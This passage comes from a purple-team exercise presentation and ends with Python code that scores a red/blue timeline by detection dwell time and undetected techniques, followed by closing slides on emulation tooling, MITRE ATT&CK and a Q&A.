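        "hunt_team_engaged": first_blue(timeline, "hunt_engaged") is not None,
        "prevented": sorted(e.kind for e in red if e.prevented),
        "undetected": [],
        "dwell_min": {},
    }
    # Per-TTP dwell: from the red action to the first blue event that names it.
    for action in red:
        if action.prevented:
            continue
        seen = [e.ts for e in timeline
                if e.team == "blue" and e.technique == action.kind and e.ts >= action.ts]
        if seen:
            metrics["dwell_min"][action.kind] = minutes(action.ts, min(seen))
        else:
            metrics["undetected"].append(action.kind)
    metrics["undetected"].sort()
    return metrics


if __name__ == "__main__":
    for key, value in exercise_metrics(TIMELINE).items():
        print(f"{key}: {value}")
```

Keeping the timeline as data rather than as a narrative report means the same numbers can be recomputed after the next exercise and compared, which is what turns "the Blue Team got better" into a measurable claim.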
• 26. Diagram labels: Threat Catalog; Cyber Threat Intelligence; Emulation Plan; C2 Server & Reports for the Business; MITRE ATT&CK; Production; Automated Emulation; Initial Access
  https://medium.com/@jorgeorchilles/purple-team-exercise-tools-a85187ce341
  ⑊ Red Team will be asked to repeat TTPs
  ⑊ Don’t waste Red Team Operator time re-doing the same TTP while engineers, operations, and SOC get detection working
• 27. Thank you! Q & A?
  @JorgeOrchilles @C2_Matrix
  https://www.thec2matrix.com/
  https://www.sans.org/sec564